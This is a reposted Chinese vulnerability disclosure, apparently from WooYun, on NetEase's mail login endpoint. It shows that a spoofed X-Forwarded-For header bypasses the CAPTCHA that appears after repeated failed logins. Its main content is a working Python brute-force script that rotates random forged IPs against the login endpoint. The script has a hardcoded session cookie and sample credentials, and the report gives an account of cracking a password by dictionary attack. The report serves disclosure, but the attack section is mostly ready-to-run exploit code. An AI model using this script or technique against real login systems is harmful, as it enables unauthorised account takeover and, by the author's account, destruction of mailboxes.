神刀安全网

漏洞标题: 定向爆破(报废)你的网易邮箱带exp和exp制作思路

漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-31: 厂商已经确认,细节仅向厂商公开
2016-04-10: 细节向核心白帽子及相关领域专家公开
2016-04-20: 细节向普通白帽子公开
2016-04-30: 细节向实习白帽子公开
2016-05-15: 细节向公众公开

简要描述:

之前小伙伴挖到一个接口,说是可以改一下POST头就可以无限制爆破邮箱,扔给我让我去做EXP爆破,然后就发现了一堆坑爹问题,甚至报废了我自己拿来测试的邮箱。。。。。我真是日了狗了。。。。。

详细说明:

首先,进入这个网址选择邮箱登陆code>http://bbs.c.163.com/signin/</code>,本来在这里输错3出会跳出验证码,但是经过测试发现,在POST头里面加入X-Forwarded-For就可以绕过这个验证码。

之后我就根据这个,制作了一个EXP,是Python,我想讲讲思路,首先我们要先复位之前漏洞的情况,才能根据这个制作EXP,我先写了一个脚本,用来测试研究,这是代码

code 区域
# -*- coding:utf-8 -*-
import requests
import random
def A(pwd,user):
ip=str(random.randint(1,100))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))+"."+str(random.randint(100,244))
url = 'http://auth.c.163.com/rest/login/callback'
post = 'service=NCE&loginType=1&errorCallback=http%3A%2F%2Fbbs.c.163.com%2FsigninError&callback=http%3A%2F%2Fbbs.c.163.com%2FsigninCallback&autoLogin=true&userName='+user+'&password='+pwd
headers = {'POST':'/rest/login/callback HTTP/1.1',
'Host':'auth.c.163.com',
'User-Agent':' Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding':'gzip, deflate',
'DNT':'1',
"X-Forwarded-For":ip,
'Referer':'http://bbs.c.163.com/signin',
'Cookie':' __utma=5463265.1819682429.1458918249.1458918249.1458918249.1; __utmz=5463265.1458918249.1.1.utmcsr=bbs.c.163.com|utmccn=(referral)|utmcmd=referral|utmcct=/signin/; _ga=GA1.2.1620526553.1459001670; Province=020; City=0755; vjuids=8430fc37.153b34708b9.0.90c7314b44efc8; vjlast=1459001690.1459001690.30; _ntes_nnid=4cc3ad38d63fc0971fba002dc274581e,1459001690337; vinfo_n_f_l_n3=a707719c6786aa8c.1.1.1459001690365.1459001692002.1459007251991; _ntes_nuid=4cc3ad38d63fc0971fba002dc274581e; AUTHC=2f81e22c3cbe0a3e1ff73bd007fbef95d7aa42b0',
'Connection':'close',
'Content-Type':'application/x-www-form-urlencoded',
'Content-Length':'230'
}
r = requests.post(url,post,headers=headers,allow_redirects=False)
return r.headers
print A(user='[email protected]',pwd='qq147855')

我相信大家都看到懂,一个简单的复现程序,我们先运行试试。

漏洞标题:  定向爆破(报废)你的网易邮箱带exp和exp制作思路

开始破解了

漏洞标题:  定向爆破(报废)你的网易邮箱带exp和exp制作思路

开始破解了

漏洞标题:  定向爆破(报废)你的网易邮箱带exp和exp制作思路

为了演示,我随便拿的一个字典,正确密码再最后,别吐槽我字典。

漏洞标题:  定向爆破(报废)你的网易邮箱带exp和exp制作思路

密码出来了,本来以为这个洞也就这样了,,,,因为我作死,经常测试,,,,结果我的账号。。。

漏洞标题:  定向爆破(报废)你的网易邮箱带exp和exp制作思路

即使输入正确的密码,走普通用户路线。。。也无法登陆,出现这个什么鬼邮箱认证失败。。。。。。

我试了重置账号密码等等一系列手段,只有最后重新注册覆盖才能使用,但是以前的数据全部被覆盖消失了。。。。。我只能说,这个EXP可能附带报废你的网易邮箱,拿自己邮箱测试的时候需谨慎。。。。。

修复方案:

咳咳,洗澡吧

版权声明:转载请注明来源 肖泽@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 定向爆破(报废)你的网易邮箱带exp和exp制作思路

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址